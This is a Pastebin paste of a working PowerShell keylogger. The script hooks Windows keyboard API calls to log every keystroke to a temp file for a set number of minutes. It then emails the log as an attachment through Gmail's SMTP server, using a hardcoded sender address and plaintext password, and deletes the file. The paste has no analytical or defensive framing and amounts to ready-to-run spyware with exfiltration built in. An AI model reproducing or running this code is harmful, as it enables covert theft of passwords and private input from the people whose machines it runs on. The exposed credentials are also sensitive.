Advertisement
Guest User

Untitled

a guest
Feb 23rd, 2020
240
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.81 KB | None | 0 0
  1. $TimeToRun = 60
  2. $From = "cluis6575@gmail.com"
  3. $Pass = "2481587483"
  4. $To = "user2@gmail.com"
  5. $Subject = "Keylogger Results"
  6. $body = "Keylogger Results"
  7. $SMTPServer = "smtp.gmail.com"
  8. $SMTPPort = "587"
  9. $credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
  10. ############################
  11.  
  12.  
  13. $TimeStart = Get-Date
  14. $TimeEnd = $timeStart.addminutes($TimeToRun)
  15.  
  16. #requires -Version 2
  17. function Start-KeyLogger($Path="$env:temp\keylogger.txt")
  18. {
  19. # Signatures for API Calls
  20. $signatures = @'
  21. [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
  22. public static extern short GetAsyncKeyState(int virtualKeyCode);
  23. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  24. public static extern int GetKeyboardState(byte[] keystate);
  25. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  26. public static extern int MapVirtualKey(uint uCode, int uMapType);
  27. [DllImport("user32.dll", CharSet=CharSet.Auto)]
  28. public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
  29. '@
  30.  
  31. # load signatures and make members available
  32. $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
  33.  
  34. # create output file
  35. $null = New-Item -Path $Path -ItemType File -Force
  36.  
  37. try
  38. {
  39.  
  40. # create endless loop. When user presses CTRL+C, finally-block
  41. # executes and shows the collected key presses
  42. while ($TimeEnd -ge $TimeNow) {
  43. Start-Sleep -Milliseconds 40
  44.  
  45. # scan all ASCII codes above 8
  46. for ($ascii = 9; $ascii -le 254; $ascii++) {
  47. # get current key state
  48. $state = $API::GetAsyncKeyState($ascii)
  49.  
  50. # is key pressed?
  51. if ($state -eq -32767) {
  52. $null = [console]::CapsLock
  53.  
  54. # translate scan code to real code
  55. $virtualKey = $API::MapVirtualKey($ascii, 3)
  56.  
  57. # get keyboard state for virtual keys
  58. $kbstate = New-Object Byte[] 256
  59. $checkkbstate = $API::GetKeyboardState($kbstate)
  60.  
  61. # prepare a StringBuilder to receive input key
  62. $mychar = New-Object -TypeName System.Text.StringBuilder
  63.  
  64. # translate virtual key
  65. $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
  66.  
  67. if ($success)
  68. {
  69. # add key to logger file
  70. [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)
  71. }
  72. }
  73. }
  74. $TimeNow = Get-Date
  75. }
  76. }
  77. finally
  78. {
  79. # open logger file in Notepad
  80. send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
  81. Remove-Item -Path $Path -force
  82. exit 1
  83. }
  84. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement